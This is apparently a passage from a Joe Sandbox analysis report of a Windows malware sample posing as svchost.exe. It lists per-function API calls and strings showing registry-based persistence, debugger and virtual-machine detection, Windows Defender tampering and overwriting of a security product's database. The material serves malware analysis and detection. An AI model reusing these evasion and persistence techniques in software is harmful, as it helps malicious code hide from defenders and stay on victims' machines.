\\.\KmxAgent, xrefs: 004021C8
t, xrefs: 004022D4
e, xrefs: 0040226B
4, xrefs: 004022B8
m, xrefs: 004022E2
t, xrefs: 004022E9
s, xrefs: 00402272
", xrefs: 00402287
E, xrefs: 0040229C
0, xrefs: 004022BF
E, xrefs: 004022A3
D, xrefs: 004022B1

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
API String ID: 33631002-3172865025
Opcode ID: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
Instruction ID: 9d4a94b5be36249e2462cbbb3280e2e36e0391c5559e4b339ada8e43b165569f
Opcode Fuzzy Hash: 5d3052d786f23041ab38784f47b9df179f9997e430cc2c34ba2090ab9676636a
Instruction Fuzzy Hash: D04194B0D01358DEEB20CF95D9887DEFEB5BB04309F5081ADD5186B241C7B90A89CF55

Function 02D07220 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 142
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a3b7fb16a,76EDC3F0,?,?,02D122F0,00000000,00000001), ref: 02D07246
GetFileSizeEx.KERNEL32(00000000,?,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D07264
GetProcessHeap.KERNEL32(00000008,?,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D0728D
RtlAllocateHeap.NTDLL(00000000,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D07294
memset.MSVCRT ref: 02D072A7
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D072D3
LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D072E3
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D072F2
UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D07305
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D07314
HeapValidate.KERNEL32(00000000), ref: 02D0731B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D07328
HeapFree.KERNEL32(00000000), ref: 02D0732F
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D0734F
FindCloseChangeNotification.KERNEL32(00000000), ref: 02D07360
IsBadWritePtr.KERNEL32(00000000,00000004,?,a3b7fb16a,76EDC3F0,?,?,02D122F0,00000000,00000001,?,7591F550,00000000), ref: 02D07370

Strings

a3b7fb16a, xrefs: 02D07227

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
String ID: a3b7fb16a
API String ID: 213124939-2992131447
Opcode ID: 4f0ba3a5715910a32c4a67fc04400677453351b629eff992dbdd3cb7904d06c4
Instruction ID: 6c3e48636d3af96a2907b8de50ed08e059f0df7fc476d073e4d9438ca12ecd6e
Opcode Fuzzy Hash: 4f0ba3a5715910a32c4a67fc04400677453351b629eff992dbdd3cb7904d06c4
Instruction Fuzzy Hash: E641A775A80304BBFB209FA59C89F9BBBACFB54714F508515BE15AA3C0D774AD10CBA0

Function 00401130 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 132
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00401152
memset.MSVCRT ref: 00401171
IsUserAnAdmin.SHELL32 ref: 0040118A
RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,?,?,?,?,?,00000000), ref: 004011B0
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,?,?,?,00000000), ref: 004011CF
PathAddBackslashA.SHLWAPI(?,?,?,?,?,?,00000000), ref: 004011DC
GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000), ref: 004011F3
_snprintf.MSVCRT ref: 0040120E
RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000104,755CDB30), ref: 00401275
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000102,?,?,?,?,?,?,00000000), ref: 00401294
RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 004012B0
RegFlushKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012BE
RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 004012C8

Strings

SystemDrive, xrefs: 004011CA
userinit, xrefs: 004012AA
software\microsoft\windows\currentversion\run, xrefs: 0040128A
software\microsoft\windows nt\currentversion\winlogon, xrefs: 004011A6

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Valuememset$AdminBackslashCloseCreateEnvironmentFlushInformationOpenPathUserVariableVolume_snprintf
String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
API String ID: 1223198359-2324515132
Opcode ID: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
Instruction ID: 4a3cd719fa0b6a36e3fea1ee33c0aaef39b8e779ef0c2e0c240036d9f7b98d71
Opcode Fuzzy Hash: 8f54ca177bf132b48ff55439b3f2ba1deef55dafc0629b9cb850c6a94148175c
Instruction Fuzzy Hash: 5341BEB164020CBFEB10DBA49DC9EEA777CEB94704F0041B9F345B6191E6B45F888BA4

Function 02D03440 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 128
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02D0347B
GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02D0349A
PathAddBackslashA.SHLWAPI(?), ref: 02D034A7
GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02D034C4
_snprintf.MSVCRT ref: 02D034DF
RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02D03503
RegQueryValueExA.KERNEL32(00000000,?,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D0351F
PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02D035AD
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02D035CC
RegQueryValueExA.ADVAPI32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02D035E6
RegCloseKey.KERNEL32(00000000), ref: 02D035F5

Strings

software\microsoft\windows\currentversion\run, xrefs: 02D035C2
C:\Windows\apppatch\svchost.exe, xrefs: 02D0350C, 02D0358E, 02D03593, 02D035A8, 02D035D5
SystemDrive, xrefs: 02D03491
userinit, xrefs: 02D035E0
software\microsoft\windows nt\currentversion\winlogon, xrefs: 02D034F9
\t, xrefs: 02D034A7

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: OpenPathQueryValue$BackslashCloseEnvironmentExistsFileInformationVariableVolume_snprintfmemset
String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit$\t
API String ID: 3269704094-1925358783
Opcode ID: e8a9f394e07426c354b9308a6beacdc6920fba59a41ae40ddcddb91c1af0070c
Instruction ID: e4239cce911921d33de51569bfdad71ca8285b63879fcc65086eb13dd9483b2d
Opcode Fuzzy Hash: e8a9f394e07426c354b9308a6beacdc6920fba59a41ae40ddcddb91c1af0070c
Instruction Fuzzy Hash: 7641BB75A8020DFBFB14CB54EC8AFED7779EB54704F504598F505A6290EAF06E488BA0

Function 02D06110 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 204
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02D06180
memset.MSVCRT ref: 02D0619A
memset.MSVCRT ref: 02D061B4
strtol.MSVCRT ref: 02D0622A
strstr.MSVCRT ref: 02D062AA

Strings

eyuioa, xrefs: 02D0613F
qwrtpsdfghjklzxcvbnm, xrefs: 02D06119
1676d5775e05c50b46baa5579d4fc7, xrefs: 02D061D4
%s%s, xrefs: 02D06391

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: memset$strstrstrtol
String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
API String ID: 600650289-3097137778
Opcode ID: 54a2b740ddda8f7ea6ca9cc8991c5de42cf9dbc31070125c302b57aa06432c61
Instruction ID: 4cd69083ebdd04bc9d4128246b5a5dc90633a5c28da0db2dc98888df1e13e69a
Opcode Fuzzy Hash: 54a2b740ddda8f7ea6ca9cc8991c5de42cf9dbc31070125c302b57aa06432c61
Instruction Fuzzy Hash: C5712430E442555BEB11CF78AC80BDEBBE9EF69300F4445A8D988A73C1D7709E54CBA1

Function 00401000 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 104
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00401014
FindWindowA.USER32(OLLYDBG,00000000), ref: 0040102A
memset.MSVCRT ref: 0040104B
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00401056
Process32First.KERNEL32 ref: 00401071
StrStrIA.SHLWAPI(?,wireshark.exe), ref: 0040108D
Process32Next.KERNEL32(00000000,?), ref: 0040109D
GetHandleInformation.KERNEL32(00000000,00000000), ref: 004010B9
FindCloseChangeNotification.KERNEL32(00000000), ref: 004010CB
PathFileExistsA.SHLWAPI(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 00401104

Strings

wireshark.exe, xrefs: 00401083
OLLYDBG, xrefs: 00401025
vmwaretray.exe, xrefs: 004010F1
\\?\globalroot\systemroot\system32\vmx_fb.dll, xrefs: 004010FF
idag.exe, xrefs: 004010E3
dumpcap.exe, xrefs: 004010D5

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FindProcess32$ChangeCloseCreateDebuggerExistsFileFirstHandleInformationNextNotificationPathPresentSnapshotToolhelp32Windowmemset
String ID: OLLYDBG$\\?\globalroot\systemroot\system32\vmx_fb.dll$dumpcap.exe$idag.exe$vmwaretray.exe$wireshark.exe
API String ID: 1862551656-1290435522
Opcode ID: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
Instruction ID: c60aa232edd69d9eafc6284c2fbf788a46e5342051cb1b5dbcb922c87a134ace
Opcode Fuzzy Hash: 561d3b303acbb630b127acd8213a7a6d32d8b3e20dd43d251141123fbd81c6f9
Instruction Fuzzy Hash: AB31E9B160430057D310AB66AC49B6BB7ECDBD8764F01013BFF44F62E1E77C888586AA

Function 02D01720 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 104processCOMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(02D06C17,00000000,?), ref: 02D01734
FindWindowA.USER32(OLLYDBG,00000000), ref: 02D0174A
memset.MSVCRT ref: 02D0176B
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D01776
Process32First.KERNEL32 ref: 02D01791
StrStrIA.SHLWAPI(?,wireshark.exe), ref: 02D017AD
Process32Next.KERNEL32(00000000,?), ref: 02D017BD
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D017D9
CloseHandle.KERNEL32(00000000), ref: 02D017EB
PathFileExistsA.SHLWAPI(\\?\globalroot\systemroot\system32\vmx_fb.dll,vmwaretray.exe,idag.exe,dumpcap.exe), ref: 02D01824

Strings

dumpcap.exe, xrefs: 02D017F5
\\?\globalroot\systemroot\system32\vmx_fb.dll, xrefs: 02D0181F
vmwaretray.exe, xrefs: 02D01811
idag.exe, xrefs: 02D01803
OLLYDBG, xrefs: 02D01745
wireshark.exe, xrefs: 02D017A3

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleProcess32$CloseCreateDebuggerExistsFileFindFirstInformationNextPathPresentSnapshotToolhelp32Windowmemset
String ID: OLLYDBG$\\?\globalroot\systemroot\system32\vmx_fb.dll$dumpcap.exe$idag.exe$vmwaretray.exe$wireshark.exe
API String ID: 2741144142-1290435522
Opcode ID: 68984dd164e44cbaf1338f76b01f62184b93bbc08e70dcdec38dbfdb713e65f2
Instruction ID: fefa7822f7895229be8d80c6ce96a36b069f8a4d25641e91e3490e85a3124899
Opcode Fuzzy Hash: 68984dd164e44cbaf1338f76b01f62184b93bbc08e70dcdec38dbfdb713e65f2
Instruction Fuzzy Hash: 6A3109766003516BE2109F65BC88BABB7D8DFD5758F440529FD49C2390FB70DD18CAA2

Function 00402520 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040253C
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025A0
SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025C3
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025D8
SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004025E4
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F3
SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004025FF
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040260E
SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040261A
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402629
SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402635
WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402644
CloseHandle.KERNEL32(00000000), ref: 00402647

Strings

\PrevxCSI\csidb.csi, xrefs: 0040255A

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$PointerWrite$CloseCreateFolderHandlePath
String ID: \PrevxCSI\csidb.csi
API String ID: 606440919-2829233815
Opcode ID: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
Instruction ID: 03c6ffd3b6dc1066bd99cfbbbb98c4e24752acf73b2e09b6b1ad6d20697dc7f7
Opcode Fuzzy Hash: be0fb7a0fec5371cefce781ec144b0ab90dff0a006d7a44f6523beb7c466cbb6
Instruction Fuzzy Hash: FB312A716842187EF311EB90DD9AFEA7768EB89B00F104155F304AA1D0DBF1AA45CBE9

Function 00401FB0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401FD6
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401FE7
GetLastError.KERNEL32 ref: 00401FF0
SwitchToThread.KERNEL32 ref: 00401FFF
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00402008
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00402028
FindCloseChangeNotification.KERNEL32(00000000), ref: 00402039
Module32First.KERNEL32(00000000,?), ref: 0040205A
StrStrIA.SHLWAPI(?,kernel), ref: 0040207C
StrStrIA.SHLWAPI(00000000,.dll), ref: 00402088
Module32Next.KERNEL32(00000000,00000224), ref: 00402096

Strings

.dll, xrefs: 00402082
kernel, xrefs: 00402070

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: CreateModule32SnapshotToolhelp32$ChangeCloseErrorFindFirstHandleInformationLastNextNotificationSwitchThreadmemset
String ID: .dll$kernel
API String ID: 1233480013-2375045364
Opcode ID: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
Instruction ID: 8973f4922baf9af671f2a19144e2d86d5cf9878df638c7e503d434612b68899c
Opcode Fuzzy Hash: 879494545999ec302966fa281da3315520f63b38012031968e87e0d656fbeae2
Instruction Fuzzy Hash: F721EB7190131477D7109BA5AE4DB9F77A8ABC8310F100276EB04F32D1DB789E41C669

Function 02D252D0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D252F6
CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D25307
GetLastError.KERNEL32 ref: 02D25310
SwitchToThread.KERNEL32 ref: 02D2531F
CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02D25328
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D25348
CloseHandle.KERNEL32(00000000), ref: 02D25359
Module32First.KERNEL32(00000000,?), ref: 02D2537A
StrStrIA.SHLWAPI(?,kernel), ref: 02D2539C
StrStrIA.SHLWAPI(00000000,.dll), ref: 02D253A8
Module32Next.KERNEL32(00000000,00000224), ref: 02D253B6

Strings

.dll, xrefs: 02D253A2
kernel, xrefs: 02D25390

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
String ID: .dll$kernel
API String ID: 2979424695-2375045364
Opcode ID: 2c42d2e488d68918d516dcbaddfd417bd6410cbcfcb7aaa129b9d3e809665ac1
Instruction ID: 87d1f79bb6493a1464b91a559da62b457d07fb352eb9cd35ff7b0b5409dd7611
Opcode Fuzzy Hash: 2c42d2e488d68918d516dcbaddfd417bd6410cbcfcb7aaa129b9d3e809665ac1
Instruction Fuzzy Hash: 0A21FB76D41224BBD7109EA4BD48F9E73E8EB59328FD41155D945D3340DB70DD09C7A0

Function 02D24450 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,00000000,7591F550,00000000,76EDC3F0), ref: 02D24465
OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,?,?,?,02D153C3), ref: 02D2447C
GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?), ref: 02D2449A
CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D153C3), ref: 02D244B2
CharUpperA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,02D153C3), ref: 02D244D8
GetHandleInformation.KERNEL32(?,00000000), ref: 02D2450B
FindCloseChangeNotification.KERNEL32(?), ref: 02D2451C
GetHandleInformation.KERNEL32(00000000,?), ref: 02D2452E
CloseHandle.KERNEL32(00000000), ref: 02D2453F

Strings

*SYSTEM*, xrefs: 02D244AD
ADVA, xrefs: 02D244DE

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: HandleInformation$CharCloseOpenProcessTokenUpper$ChangeFindNotification
String ID: *SYSTEM*$ADVA
API String ID: 4044281766-3691563785
Opcode ID: d27c70f7c2f3052ef852ed7b5acb8cb33e23da03f3d34ed88a2004e9614d3bea
Instruction ID: a1fd49b582b7c884ae08ea296a6b356cb634cd6950a49b72acf42f4f9714ed92
Opcode Fuzzy Hash: d27c70f7c2f3052ef852ed7b5acb8cb33e23da03f3d34ed88a2004e9614d3bea
Instruction Fuzzy Hash: B231A475D00258AFDB10CFA4D848BAE7BBCAF6471DF448498EE466B381D7B49D09CB60

Function 00402660 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040267F
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026AD
SysAllocString.OLEAUT32(?), ref: 004026C0
SysAllocString.OLEAUT32(Windows Explorer), ref: 004026D2
CoCreateInstance.OLE32(00404E60,00000000,00004401,00404E70,?), ref: 004026FB
CoCreateInstance.OLE32(00404E80,00000000,00004401,00404E90,?), ref: 004027AF
SysFreeString.OLEAUT32(00402BFA), ref: 0040283D
SysFreeString.OLEAUT32(00000000), ref: 00402844
CoUninitialize.OLE32 ref: 0040289E

Strings

Windows Explorer, xrefs: 004026CD

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
String ID: Windows Explorer
API String ID: 1140695583-228612681
Opcode ID: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
Instruction ID: bcca5549e6a36079ff93457438ec30656b046552e7bb8440c472f06e22bdaec7
Opcode Fuzzy Hash: 48870ef3a6f763ae96f3c2dd69552aefb7b97c57adec13363160e086d84a3559
Instruction Fuzzy Hash: 3C714175A006059FCB10EB98CD84DAFB7B9AF88704B248266E904FB3D0D7B5ED42CB54

Function 02D24C00 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D24C33
GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02D24C42
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02D24C49
memset.MSVCRT ref: 02D24C61
GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D24C78
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02D24C7E

Part of subcall function 02D13D90: GetProcessHeap.KERNEL32(00000008,02D24CA7,00000000,750934D0,?,?,02D24C94,00000104,?,?,?,?,00000000), ref: 02D13DAE
Part of subcall function 02D13D90: HeapAlloc.KERNEL32(00000000,?,?,02D24C94,00000104,?,?,?,?,00000000), ref: 02D13DB5
Part of subcall function 02D13D90: memset.MSVCRT ref: 02D13DC5

GetUserNameA.ADVAPI32(00000000,00000104), ref: 02D24C9F
StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000), ref: 02D24CC6
lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000), ref: 02D24CDA

Strings

ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02D24C10

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
API String ID: 2345603349-374730529
Opcode ID: b83b67c5e5724d47f8e41a88e2636b82c07bb50ab658ae18ad30b14cc31959c2
Instruction ID: 4ff452d74f019e5ef92415117e2dc2f90b7f3bdb48fa4e5930bb9a52afa6b0aa
Opcode Fuzzy Hash: b83b67c5e5724d47f8e41a88e2636b82c07bb50ab658ae18ad30b14cc31959c2
Instruction Fuzzy Hash: BF213879E00125ABDB11DB689C44FBBB7F9BBA4705F100459FA4197340EB70AE45DBB0

Function 004020C0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004020FE
SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402114
PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040212A
SetCurrentDirectoryA.KERNEL32(?), ref: 00402137
LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402146
GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040215B
FreeLibrary.KERNEL32(00000000), ref: 0040218C

Strings

WDEnable, xrefs: 00402155
MpClient.dll, xrefs: 00402141
Windows Defender, xrefs: 0040211E

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
String ID: MpClient.dll$WDEnable$Windows Defender
API String ID: 1010965793-3061216624
Opcode ID: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
Instruction ID: 17fe50366fb736dd5c610a74938a74168bdb82ca3e71c76a348591a6388f5d5b
Opcode Fuzzy Hash: 7156f21b270df9d19488f98263c1b3c132659434c9e41277309e697b0c10c8f4
Instruction Fuzzy Hash: 8411D5B5900315BBC7209FA49D89FAABB7CEB48710F10027AFB05B61C0C2784E058AA8

Function 02D14A16 Relevance: 16.6, APIs: 11, Instructions: 77memorynetworkCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D14A6F
HeapValidate.KERNEL32(00000000), ref: 02D14A72
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D14A7F
HeapFree.KERNEL32(00000000), ref: 02D14A82
GetProcessHeap.KERNEL32(00000000,?), ref: 02D14A9A
HeapValidate.KERNEL32(00000000), ref: 02D14A9D
GetProcessHeap.KERNEL32(00000000,?), ref: 02D14AAA
HeapFree.KERNEL32(00000000), ref: 02D14AAD
InternetCloseHandle.WININET(00000000), ref: 02D14AC3
InternetCloseHandle.WININET(?), ref: 02D14ACD
